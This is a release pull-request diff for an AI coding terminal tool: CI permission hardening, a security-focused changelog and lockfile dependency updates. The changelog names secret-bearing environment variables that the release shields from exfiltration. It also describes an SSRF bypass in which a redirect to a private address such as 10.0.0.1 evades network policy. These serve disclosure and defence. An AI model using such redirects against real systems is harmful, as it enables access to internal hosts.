### PR TITLE
chore(release): prepare v0.8.23

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -8,6 +8,9 @@ on:
   schedule:
     - cron: '31 6 * * 1'
 
+permissions:
+  contents: read
+
 env:
   CARGO_TERM_COLOR: always
   RUSTFLAGS: -Dwarnings

--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -10,6 +10,9 @@ on:
         required: true
         type: string
 
+permissions:
+  contents: read
+
 env:
   CARGO_TERM_COLOR: always
   RUSTFLAGS: -Dwarnings

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -40,6 +40,8 @@ fixes uncovered during follow-up review.
   with recent advisories.
 - **MCP config paths reject traversal** - `load_config`/`save_config` now
   refuse paths containing `..` components.
+- **Hardened `run_tests` approval policy.** Thanks to **@47Cid** for the
+  responsible disclosure.
 
 ### Fixed
 
@@ -86,18 +88,12 @@ fixes uncovered during follow-up review.
 
 ## [0.8.22] - 2026-05-08
 
-A focused security release: validate redirected `fetch_url` targets before
-following them so a server-controlled redirect cannot bypass per-domain
-network policy or steer the client at private/link-local IPs.
+A focused security release.
 
 ### Security
 
-- **Validate redirected fetch targets** - the URL the redirect points to is
-  re-evaluated against the network policy and SSRF guards before any second
-  request is issued. Previously the policy decision was made only on the
-  initial URL, so a server response of `Location: http://10.0.0.1/...` could
-  reach a private host even if `fetch_url` would have rejected the same URL
-  if requested directly.
+- **Hardened `fetch_url` redirect handling.** Thanks to **@47Cid** for the
+  responsible disclosure.
 
 ## [0.8.21] - 2026-05-08
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,6 +5,189 @@ All notable changes to this project will be documented in this file.
 The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/),
 and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
 
+## [0.8.23] - 2026-05-08
+
+A security-focused follow-up to v0.8.22. The bulk of the diff is hardening of
+the child-process surface — shells, MCP stdio servers, and other spawned
+subprocesses — plus a related set of MCP, secret-store, and tool-policy
+fixes uncovered during follow-up review.
+
+### Security
+
+- **Sanitized child-process environments** - shells, MCP stdio servers, hooks,
+  and other child processes spawned from the TUI now start from an explicit
+  allowlist of parent environment variables rather than inheriting every
+  parent var. The base allowlist covers `PATH`, `HOME`, `USER`, `LANG`/`LC_*`,
+  `TERM`/`COLORTERM`, `SHELL`, `TMPDIR`/`TMP`/`TEMP`, and the corresponding
+  Windows variables. Stops casual exfiltration of `*_API_KEY`, `AWS_*`,
+  `GITHUB_TOKEN`, and similar through a spawned subprocess.
+- **Tighter shell safety classification** - the `exec_shell` deny-list was
+  reviewed and broadened to cover additional dangerous command patterns.
+- **Plan mode tool surface narrowed** - planning sub-agents see a smaller,
+  read-only tool surface so a plan-mode call can no longer mutate workspace
+  state.
+- **Sub-agent approval boundaries preserved** - sub-agents inherit the
+  parent's approval policy and cannot escalate beyond it.
+- **Symlinked workspace walks no longer followed** - workspace-relative
+  walkers (file-search, project context) now refuse to traverse symlinks
+  pointing outside the workspace root.
+- **Path and output handling tightened** - several tools that build paths
+  from model output now reject `..` segments and absolute paths outside the
+  workspace.
+- **Runtime API requires authentication by default** - `deepseek serve --http`
+  no longer accepts unauthenticated requests in its default configuration.
+- **Security-sensitive dependencies bumped** - routine bump pass for crates
+  with recent advisories.
+- **MCP config paths reject traversal** - `load_config`/`save_config` now
+  refuse paths containing `..` components.
+
+### Fixed
+
+- **macOS Keychain prompt at startup** - the file-backed secret store is now
+  the default. The OS keyring is opt-in via
+  `DEEPSEEK_SECRET_BACKEND=system|keyring`, and the auth status surface
+  refers to "secret store" rather than "keyring" where appropriate.
+- **MCP stdio spawn errors are now visible (#1244)** - when spawning a stdio
+  MCP server fails (e.g., `npx` not on `PATH`), the underlying OS error is
+  now shown ("No such file or directory (os error 2)") instead of the opaque
+  wrapper "MCP stdio spawn failed (...)". The fix applies to the snapshot,
+  the `mcp connect` / `mcp validate` CLI commands, and the in-TUI status
+  events.
+- **MCP servers no longer break under env scrub (#1244)** - MCP stdio launches
+  now inherit a wider env allowlist than arbitrary shell tools, so common
+  `npx ...`, `uvx ...`, `python -m mcp_server_*`, and proxy-bound corporate
+  setups keep working under the new child-env scrub. Pass-through includes
+  `NVM_DIR`, `NODE_OPTIONS`, `NODE_PATH`, `NODE_EXTRA_CA_CERTS`,
+  `NPM_CONFIG_*`, `VOLTA_HOME`, `COREPACK_HOME`, `PYTHONPATH`, `PYTHONHOME`,
+  `VIRTUAL_ENV`, `PIPX_*`, `POETRY_HOME`, `UV_*`, `GEM_*`, `BUNDLE_*`,
+  `JAVA_HOME`, `HTTP_PROXY` / `HTTPS_PROXY` / `NO_PROXY` / `ALL_PROXY` /
+  `FTP_PROXY` (case-insensitive), `SSL_CERT_FILE`, `SSL_CERT_DIR`,
+  `REQUESTS_CA_BUNDLE`, `CURL_CA_BUNDLE`. Secret-bearing parent env stays
+  scrubbed.
+
+### Changed
+
+- **Live thinking is compact by default** - the streaming "thinking" panel
+  collapses by default; expand via the existing details toggle.
+
+### Added
+
+- **`docs/RELEASE_CHECKLIST.md`** - explicit pre-tag checklist (CHANGELOG,
+  versions, preflight, npm wrapper smoke) so the v0.8.21/v0.8.22 CHANGELOG
+  gap does not recur.
+
+### Known issues
+
+- **Mid-run MCP server stderr is still suppressed** - if a stdio MCP server
+  spawns successfully but exits later (e.g., crashes during `initialize`),
+  its stderr is not yet captured. Spawn-time OS errors (the most common
+  case from #1244) are visible. Full mid-run stderr capture is planned for
+  v0.8.24.
+
+## [0.8.22] - 2026-05-08
+
+A focused security release: validate redirected `fetch_url` targets before
+following them so a server-controlled redirect cannot bypass per-domain
+network policy or steer the client at private/link-local IPs.
+
+### Security
+
+- **Validate redirected fetch targets** - the URL the redirect points to is
+  re-evaluated against the network policy and SSRF guards before any second
+  request is issued. Previously the policy decision was made only on the
+  initial URL, so a server response of `Location: http://10.0.0.1/...` could
+  reach a private host even if `fetch_url` would have rejected the same URL
+  if requested directly.
+
+## [0.8.21] - 2026-05-08
+
+A community-heavy release rolling up two weeks of contributor PRs across the
+TUI, runtime, and docs. Big thanks to **Reid (@reidliu41)**,
+**jiaren wang (@JiarenWang)**, **Friende (@pengyou200902)**,
+**ZzzPL (@Oliver-ZPLiu)**, **Sun**, **Liu-Vince**, **kitty**, and
+**Aqil Aziz** for the contributions below.
+
+### Added
+
+- **Distinct user-message body color** (#1168) - user turns now render in a
+  green body color so the conversation flow is easier to scan at a glance.
+
+### Fixed
+
+- **Plan mode enforces read-only tool boundaries** (#1114) - planning calls
+  can no longer reach into write-side tools. Thanks **jiaren wang**.
+- **Composer arrow keys navigate input history** (#1117) - up/down in the
+  composer cycles through prior prompts when the cursor is on the first/last
+  line. Thanks **Reid**.
+- **RLM preserves prompt cache usage** (#1127) - the RLM batch path no longer
+  resets prompt-cache hits between calls. Thanks **Sun**.
+- **`fetch_url` proxy DNS opt-in** (#1103) - the proxy DNS path is now opt-in
+  rather than always forced, fixing breakage in environments where the proxy
+  cannot resolve the target host. Thanks **Sun**.
+- **Undo syncs session context after snapshot restore** (#1150, fixes #1139) -
+  rolling back a turn now correctly resyncs the in-memory session so a
+  follow-up turn doesn't see stale context. Thanks **jiaren wang**.
+- **Stale busy-state watchdog** (#1170) - the TUI now recovers if the busy
+  indicator gets stuck after an aborted turn. Thanks **ZzzPL**.
+- **`gh` discovered across common install paths** - the `gh` tool is found
+  whether installed via Homebrew, apt, the Windows MSI, or the GitHub CLI
+  installer. Thanks **kitty**.
+- **Code block indentation preserved in transcript** - leading whitespace
+  inside fenced code blocks is no longer collapsed during rendering.
+  Thanks **Liu-Vince**.
+- **Stream pacing preserves upstream cadence** - long streaming responses
+  no longer chunk together when the upstream is bursty.
+  Thanks **Sun**.
+- **Task list output gets headers** - the long-form `/tasks` output now has
+  group headers so it scans cleanly. Thanks **Reid**.
+- **macOS option-V details shortcut** - the details toggle now works correctly
+  on US Mac keyboards where Option+V produces `√`.
+- **Uppercase approval shortcuts accepted** - `[A]/[D]/[V]` work in either
+  case in the approval dialog.
+- **Transcript scrollbar inert** - the transcript scrollbar no longer captures
+  clicks intended for content below it.
+- **Hide transcript rail before code blocks** - the rail glyph no longer
+  bleeds onto the line just above a fenced code block.
+- **Pager exit hint prominent** - the "press q to exit" hint is now visible
+  on the pager footer.
+- **Empty tool call names fall back to a placeholder** - a model that returns
+  an empty `function.name` in a tool call no longer hangs the turn.
+- **MCP SSE waits for endpoint before connect returns** (#1225) - the SSE
+  transport no longer reports "connected" before the endpoint event has been
+  received, fixing a race where the first request was lost.
+- **Git branch status item renders** (#1226, fixes #1217) - the
+  `StatusItem::GitBranch` toggle now produces a footer entry instead of a
+  blank slot.
+- **Beta endpoint routes non-beta paths to v1** (#1174) - paths that aren't
+  available on the DeepSeek beta host are transparently redirected to the v1
+  host instead of failing.
+- **Skill packs accept workflow-pack archive layouts** (#1164) - skill
+  archives produced by the workflow pack tool now install correctly.
+- **Interactive sessions stay in alternate screen** (#1158) - returning from
+  a sub-process no longer kicks the TUI back to the primary screen mid-turn.
+- **Slash-menu arrow navigation wraps** (#1152) - up at the top / down at the
+  bottom of the slash menu wraps to the other end.
+- **CLI preserves split prompt words from Windows shims** (#1160) - prompt
+  arguments forwarded by the npm wrapper on Windows are no longer joined into
+  one giant token.
+- **`libc` extended to all Unix targets** (#1173) - improves FreeBSD build
+  compatibility.
+- **Memory truncation marker reports omitted bytes** - the `[…N bytes
+  omitted]` marker now shows an accurate count. Thanks **Friende**.
+
+### Docs
+
+- **Memory skill link** (#1096) - corrected. Thanks **Aqil Aziz**.
+- **Help keybinding reference** (#1095) - corrected. Thanks **Friende**.
+- **Additional environment variables** documented in the config reference.
+  Thanks **Liu-Vince**.
+- **Docker volume guidance** - the install snippet now uses a writable named
+  data volume rather than a bind mount that may be read-only on some hosts.
+- **Competitive analysis reflects LSP diagnostics** (#1171) - the doc now
+  matches the shipping LSP diagnostics implementation.
+- **Dispatcher path for `/run-pr`** (#1227) - the README now points at the
+  dispatcher binary.
+
 ## [0.8.20] - 2026-05-08
 
 ### Fixed

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -160,7 +160,7 @@ version = "1.1.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "40c48f72fd53cd289104fc64099abca73db4166ad86ea0b4341abe65af83dadc"
 dependencies = [
- "windows-sys 0.61.2",
+ "windows-sys 0.60.2",
 ]
 
 [[package]]
@@ -171,7 +171,7 @@ checksum = "291e6a250ff86cd4a820112fb8898808a366d8f9f58ce16d1f538353ad55747d"
 dependencies = [
  "anstyle",
  "once_cell_polyfill",
- "windows-sys 0.61.2",
+ "windows-sys 0.60.2",
 ]
 
 [[package]]
@@ -380,6 +380,15 @@ dependencies = [
  "proc-macro2",
  "quote",
  "syn 2.0.114",
+]
+
+[[package]]
+name = "atomic"
+version = "0.6.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a89cbf775b137e9b968e67227ef7f775587cde3fd31b0d8599dbd0f598a48340"
+dependencies = [
+ "bytemuck",
 ]
 
 [[package]]
@@ -636,12 +645,6 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "1e748733b7cbc798e1434b6ac524f0c1ff2ab456fe201501e6497c8417a4fc33"
 
 [[package]]
-name = "cassowary"
-version = "0.3.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "df8670b8c7b9dae1793364eafadf7239c40d669904660c5960d74cfd80b46a53"
-
-[[package]]
 name = "castaway"
 version = "0.2.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -810,7 +813,7 @@ version = "3.0.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "fde0e0ec90c9dfb3b4b1a0891a7dcd0e2bffde2f7efed5fe7c9bb00e5bfb915e"
 dependencies = [
- "windows-sys 0.59.0",
+ "windows-sys 0.52.0",
 ]
 
 [[package]]
@@ -821,20 +824,6 @@ checksum = "ba5a308b75df32fe02788e748662718f03fde005016435c444eea572398219fd"
 dependencies = [
  "bytes",
  "memchr",
-]
-
-[[package]]
-name = "compact_str"
-version = "0.8.1"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "3b79c4069c6cad78e2e0cdfcbd26275770669fb39fd308a752dc110e83b9af32"
-dependencies = [
- "castaway",
- "cfg-if",
- "itoa",
- "rustversion",
- "ryu",
- "static_assertions",
 ]
 
 [[package]]
@@ -1040,6 +1029,16 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "77727bb15fa921304124b128af125e7e3b968275d1b108b379190264f4423710"
 dependencies = [
  "hybrid-array",
+]
+
+[[package]]
+name = "csscolorparser"
+version = "0.6.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "eb2a7d3066da2de787b7f032c736763eb7ae5d355f81a68bab2675a96008b0bf"
+dependencies = [
+ "lab",
+ "phf",
 ]
 
 [[package]]
@@ -1317,7 +1316,7 @@ dependencies = [
  "pdf-extract",
  "portable-pty",
  "pretty_assertions",
- "ratatui 0.29.0",
+ "ratatui",
  "regex",
  "reqwest",
  "rustyline 15.0.0",
@@ -1376,6 +1375,12 @@ dependencies = [
 [[package]]
 name = "deepseek-tui-core"
 version = "0.8.22"
+
+[[package]]
+name = "deltae"
+version = "0.3.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5729f5117e208430e437df2f4843f5e5952997175992d1414f94c57d61e270b4"
 
 [[package]]
 name = "deranged"
@@ -1496,7 +1501,7 @@ dependencies = [
  "libc",
  "option-ext",
  "redox_users 0.5.2",
- "windows-sys 0.61.2",
+ "windows-sys 0.60.2",
 ]
 
 [[package]]
@@ -1682,7 +1687,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "39cab71617ae0d63f51a36d69f866391735b51691dbda63cf6f96d042b63efeb"
 dependencies = [
  "libc",
- "windows-sys 0.61.2",
+ "windows-sys 0.52.0",
 ]
 
 [[package]]
@@ -1696,6 +1701,15 @@ name = "euclid"
 version = "0.20.14"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "2bb7ef65b3777a325d1eeefefab5b6d4959da54747e33bd6258e789640f307ad"
+dependencies = [
+ "num-traits",
+]
+
+[[package]]
+name = "euclid"
+version = "0.22.14"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f1a05365e3b1c6d1650318537c7460c6923f1abdd272ad6842baa2b509957a06"
 dependencies = [
  "num-traits",
 ]
@@ -1732,6 +1746,16 @@ name = "fallible-streaming-iterator"
 version = "0.1.9"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "7360491ce676a36bf9bb3c56c1aa791658183a54d2744120f27285738d90465a"
+
+[[package]]
+name = "fancy-regex"
+version = "0.11.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b95f7c0680e4142284cf8b22c14a476e87d61b004a3a0861872b32ef7ead40a2"
+dependencies = [
+ "bit-set 0.5.3",
+ "regex",
+]
 
 [[package]]
 name = "fancy-regex"
@@ -1778,7 +1802,7 @@ checksum = "0ce92ff622d6dadf7349484f42c93271a0d49b7cc4d466a936405bacbe10aa78"
 dependencies = [
  "cfg-if",
  "rustix 1.1.3",
- "windows-sys 0.59.0",
+ "windows-sys 0.52.0",
 ]
 
 [[package]]
@@ -1819,6 +1843,12 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "f449e6c6c08c865631d4890cfacf252b3d396c9bcc83adb6623cdb02a8336c41"
 
 [[package]]
+name = "finl_unicode"
+version = "1.4.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9844ddc3a6e533d62bba727eb6c28b5d360921d5175e9ff0f1e621a5c590a4d5"
+
+[[package]]
 name = "fixedbitset"
 version = "0.4.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1850,12 +1880,6 @@ name = "fnv"
 version = "1.0.7"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "3f9eec918d3f24069decb9af1554cad7c880e2da24a9afd88aca000531ab82c1"
-
-[[package]]
-name = "foldhash"
-version = "0.1.5"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "d9c4f5dac5e15c24eb999c26181a6ca40b39fe946cbe4c263c7209467bc83af2"
 
 [[package]]
 name = "foldhash"
@@ -2101,24 +2125,13 @@ dependencies = [
 
 [[package]]
 name = "hashbrown"
-version = "0.15.5"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "9229cfe53dfd69f0609a49f65461bd93001ea1ef889cd5529dd176593f5338a1"
-dependencies = [
- "allocator-api2",
- "equivalent",
- "foldhash 0.1.5",
-]
-
-[[package]]
-name = "hashbrown"
 version = "0.16.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "841d1cc9bed7f9236f321df977030373f4a4163ae1a7dbfe1a51a2c1a51d9100"
 dependencies = [
  "allocator-api2",
  "equivalent",
- "foldhash 0.2.0",
+ "foldhash",
 ]
 
 [[package]]
@@ -2565,7 +2578,7 @@ checksum = "3640c1c38b8e4e43584d8df18be5fc6b0aa314ce6ebf51b53313d4306cca8e46"
 dependencies = [
  "hermit-abi",
  "libc",
- "windows-sys 0.61.2",
+ "windows-sys 0.52.0",
 ]
 
 [[package]]
@@ -2659,7 +2672,7 @@ dependencies = [
  "bytecount",
  "data-encoding",
  "email_address",
- "fancy-regex",
+ "fancy-regex 0.18.0",
  "fraction",
  "getrandom 0.3.4",
  "idna",
@@ -2703,6 +2716,12 @@ dependencies = [
  "windows-sys 0.60.2",
  "zeroize",
 ]
+
+[[package]]
+name = "lab"
+version = "0.11.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "bf36173d4167ed999940f804952e6b08197cae5ad5d572eb4db150ce8ad5d58f"
 
 [[package]]
 name = "lalrpop"
@@ -2879,15 +2898,6 @@ dependencies = [
 
 [[package]]
 name = "lru"
-version = "0.12.5"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "234cf4f4a04dc1f57e24b96cc0cd600cf2af460d4161ac5ecdd0af8e1f3b2a38"
-dependencies = [
- "hashbrown 0.15.5",
-]
-
-[[package]]
-name = "lru"
 version = "0.16.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "7f66e8d5d03f609abc3a39e6f08e4164ebf1447a732906d39eb9b99b7919ef39"
@@ -2912,6 +2922,16 @@ dependencies = [
  "serde_json",
  "serde_repr",
  "url",
+]
+
+[[package]]
+name = "mac_address"
+version = "1.1.8"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c0aeb26bf5e836cc1c341c8106051b573f1766dfa05aa87f0b98be5e51b02303"
+dependencies = [
+ "nix 0.29.0",
+ "winapi",
 ]
 
 [[package]]
@@ -2941,6 +2961,12 @@ name = "memchr"
 version = "2.7.6"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "f52b00d39961fc5b2736ea853c9cc86238e165017a493d1d5c8eac6bdc4cc273"
+
+[[package]]
+name = "memmem"
+version = "0.1.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a64a92489e2744ce060c349162be1c5f33c6969234104dbd99ddb5feb08b8c15"
 
 [[package]]
 name = "memoffset"
@@ -3139,6 +3165,17 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "cf97ec579c3c42f953ef76dbf8d55ac91fb219dde70e49aa4a6b7d74e9919050"
 
 [[package]]
+name = "num-derive"
+version = "0.4.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ed3955f1a9c7c0c15e092f9c887db08b1fc683305fdf6eb6684f22555355e202"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.114",
+]
+
+[[package]]
 name = "num-integer"
 version = "0.1.46"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -3295,6 +3332,15 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "04744f49eae99ab78e0d5c0b603ab218f515ea8cfe5a456d7629ad883a3b6e7d"
 
 [[package]]
+name = "ordered-float"
+version = "4.6.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7bb71e1b3fa6ca1c61f383464aaf2bb0e2f8e772a1f01d486832464de363b951"
+dependencies = [
+ "num-traits",
+]
+
+[[package]]
 name = "ordered-stream"
 version = "0.2.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -3353,7 +3399,7 @@ checksum = "cbb3a5387b94b9053c1e69d8abfd4dd6dae7afda65a5c5279bc1f42ab39df575"
 dependencies = [
  "adobe-cmap-parser",
  "encoding_rs",
- "euclid",
+ "euclid 0.20.14",
  "lopdf",
  "postscript",
  "type1-encoding-parser",
@@ -3367,6 +3413,49 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "9b4f627cb1b25917193a259e49bdad08f671f8d9708acfd5fe0a8c1455d87220"
 
 [[package]]
+name = "pest"
+version = "2.8.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e0848c601009d37dfa3430c4666e147e49cdcf1b92ecd3e63657d8a5f19da662"
+dependencies = [
+ "memchr",
+ "ucd-trie",
+]
+
+[[package]]
+name = "pest_derive"
+version = "2.8.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "11f486f1ea21e6c10ed15d5a7c77165d0ee443402f0780849d1768e7d9d6fe77"
+dependencies = [
+ "pest",
+ "pest_generator",
+]
+
+[[package]]
+name = "pest_generator"
+version = "2.8.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8040c4647b13b210a963c1ed407c1ff4fdfa01c31d6d2a098218702e6664f94f"
+dependencies = [
+ "pest",
+ "pest_meta",
+ "proc-macro2",
+ "quote",
+ "syn 2.0.114",
+]
+
+[[package]]
+name = "pest_meta"
+version = "2.8.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "89815c69d36021a140146f26659a81d6c2afa33d216d736dd4be5381a7362220"
+dependencies = [
+ "pest",
+ "sha2 0.10.9",
+]
+
+[[package]]
 name = "petgraph"
 version = "0.6.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -3374,6 +3463,49 @@ checksum = "b4c5cc86750666a3ed20bdaf5ca2a0344f9c67674cae0515bec2da16fbaa47db"
 dependencies = [
  "fixedbitset",
  "indexmap",
+]
+
+[[package]]
+name = "phf"
+version = "0.11.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1fd6780a80ae0c52cc120a26a1a42c1ae51b247a253e4e06113d23d2c2edd078"
+dependencies = [
+ "phf_macros",
+ "phf_shared",
+]
+
+[[package]]
+name = "phf_codegen"
+version = "0.11.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "aef8048c789fa5e851558d709946d6d79a8ff88c0440c587967f8e94bfb1216a"
+dependencies = [
+ "phf_generator",
+ "phf_shared",
+]
+
+[[package]]
+name = "phf_generator"
+version = "0.11.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3c80231409c20246a13fddb31776fb942c38553c51e871f8cbd687a4cfb5843d"
+dependencies = [
+ "phf_shared",
+ "rand 0.8.6",
+]
+
+[[package]]
+name = "phf_macros"
+version = "0.11.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f84ac04429c13a7ff43785d75ad27569f2951ce0ffd30a3321230db2fc727216"
+dependencies = [
+ "phf_generator",
+ "phf_shared",
+ "proc-macro2",
+ "quote",
+ "syn 2.0.114",
 ]
 
 [[package]]
@@ -3575,15 +3707,15 @@ dependencies = [
 
 [[package]]
 name = "quinn-proto"
-version = "0.11.13"
+version = "0.11.14"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "f1906b49b0c3bc04b5fe5d86a77925ae6524a19b816ae38ce1e426255f1d8a31"
+checksum = "434b42fec591c96ef50e21e886936e66d3cc3f737104fdb9b737c40ffb94c098"
 dependencies = [
  "aws-lc-rs",
  "bytes",
  "getrandom 0.3.4",
  "lru-slab",
- "rand 0.9.2",
+ "rand 0.9.3",
  "ring",
  "rustc-hash",
  "rustls",
@@ -3647,9 +3779,9 @@ dependencies = [
 
 [[package]]
 name = "rand"
-version = "0.9.2"
+version = "0.9.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "6db2770f06117d490610c7488547d543617b21bfa07796d7a12f6f1bd53850d1"
+checksum = "7ec095654a25171c2124e9e3393a930bddbffdc939556c914957a4c3e0a87166"
 dependencies = [
  "rand_chacha 0.9.0",
  "rand_core 0.9.5",
@@ -3701,27 +3833,6 @@ checksum = "973443cf09a9c8656b574a866ab68dfa19f0867d0340648c7d2f6a71b8a8ea68"
 
 [[package]]
 name = "ratatui"
-version = "0.29.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "eabd94c2f37801c20583fc49dd5cd6b0ba68c716787c2dd6ed18571e1e63117b"
-dependencies = [
- "bitflags 2.10.0",
- "cassowary",
- "compact_str 0.8.1",
- "crossterm 0.28.1",
- "indoc",
- "instability",
- "itertools 0.13.0",
- "lru 0.12.5",
- "paste",
- "strum 0.26.3",
- "unicode-segmentation",
- "unicode-truncate 1.1.0",
- "unicode-width 0.2.0",
-]
-
-[[package]]
-name = "ratatui"
 version = "0.30.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "d1ce67fb8ba4446454d1c8dbaeda0557ff5e94d39d5e5ed7f10a65eb4c8266bc"
@@ -3729,6 +3840,8 @@ dependencies = [
  "instability",
  "ratatui-core",
  "ratatui-crossterm",
+ "ratatui-macros",
+ "ratatui-termwiz",
  "ratatui-widgets",
 ]
 
@@ -3739,16 +3852,16 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "5ef8dea09a92caaf73bff7adb70b76162e5937524058a7e5bff37869cbbec293"
 dependencies = [
  "bitflags 2.10.0",
- "compact_str 0.9.0",
+ "compact_str",
  "hashbrown 0.16.1",
  "indoc",
  "itertools 0.14.0",
  "kasuari",
- "lru 0.16.4",
- "strum 0.27.2",
+ "lru",
+ "strum",
  "thiserror 2.0.17",
  "unicode-segmentation",
- "unicode-truncate 2.0.1",
+ "unicode-truncate",
  "unicode-width 0.2.0",
 ]
 
@@ -3765,6 +3878,26 @@ dependencies = [
 ]
 
 [[package]]
+name = "ratatui-macros"
+version = "0.7.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a7f1342a13e83e4bb9d0b793d0ea762be633f9582048c892ae9041ef39c936f4"
+dependencies = [
+ "ratatui-core",
+ "ratatui-widgets",
+]
+
+[[package]]
+name = "ratatui-termwiz"
+version = "0.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0f76fe0bd0ed4295f0321b1676732e2454024c15a35d01904ddb315afd3d545c"
+dependencies = [
+ "ratatui-core",
+ "termwiz",
+]
+
+[[package]]
 name = "ratatui-widgets"
 version = "0.3.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -3777,7 +3910,7 @@ dependencies = [
  "itertools 0.14.0",
  "line-clipping",
  "ratatui-core",
- "strum 0.27.2",
+ "strum",
  "time",
  "unicode-segmentation",
  "unicode-width 0.2.0",
@@ -3991,7 +4124,7 @@ dependencies = [
  "errno",
  "libc",
  "linux-raw-sys 0.4.15",
- "windows-sys 0.59.0",
+ "windows-sys 0.52.0",
 ]
 
 [[package]]
@@ -4004,7 +4137,7 @@ dependencies = [
  "errno",
  "libc",
  "linux-raw-sys 0.11.0",
- "windows-sys 0.61.2",
+ "windows-sys 0.52.0",
 ]
 
 [[package]]
@@ -4061,7 +4194,7 @@ dependencies = [
  "security-framework 3.5.1",
  "security-framework-sys",
  "webpki-root-certs",
- "windows-sys 0.61.2",
+ "windows-sys 0.52.0",
 ]
 
 [[package]]
@@ -4072,9 +4205,9 @@ checksum = "f87165f0995f63a9fbeea62b64d10b4d9d8e78ec6d7d51fb2125fda7bb36788f"
 
 [[package]]
 name = "rustls-webpki"
-version = "0.103.8"
+version = "0.103.13"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "2ffdfa2f5286e2247234e03f680868ac2815974dc39e00ea15adc445d0aafe52"
+checksum = "61c429a8649f110dddef65e2a5ad240f747e85f7758a6bccc7e5777bd33f756e"
 dependencies = [
  "aws-lc-rs",
  "ring",
@@ -4236,7 +4369,7 @@ dependencies = [
  "indexmap",
  "jsonschema",
  "percent-encoding",
- "ratatui 0.30.0",
+ "ratatui",
  "regex",
  "serde",
  "serde_json",
@@ -4440,7 +4573,7 @@ dependencies = [
  "ioctl-rs",
  "libc",
  "serial-core",
- "termios",
+ "termios 0.2.2",
 ]
 
 [[package]]
@@ -4716,33 +4849,11 @@ checksum = "7da8b5736845d9f2fcb837ea5d9e2628564b3b043a70948a3f0b778838c5fb4f"
 
 [[package]]
 name = "strum"
-version = "0.26.3"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "8fec0f0aef304996cf250b31b5a10dee7980c85da9d759361292b8bca5a18f06"
-dependencies = [
- "strum_macros 0.26.4",
-]
-
-[[package]]
-name = "strum"
 version = "0.27.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "af23d6f6c1a224baef9d3f61e287d2761385a5b88fdab4eb4c6f11aeb54c4bcf"
 dependencies = [
- "strum_macros 0.27.2",
-]
-
-[[package]]
-name = "strum_macros"
-version = "0.26.4"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "4c6bee85a5a24955dc440386795aa378cd9cf82acd5f764469152d2270e581be"
-dependencies = [
- "heck",
- "proc-macro2",
- "quote",
- "rustversion",
- "syn 2.0.114",
+ "strum_macros",
 ]
 
 [[package]]
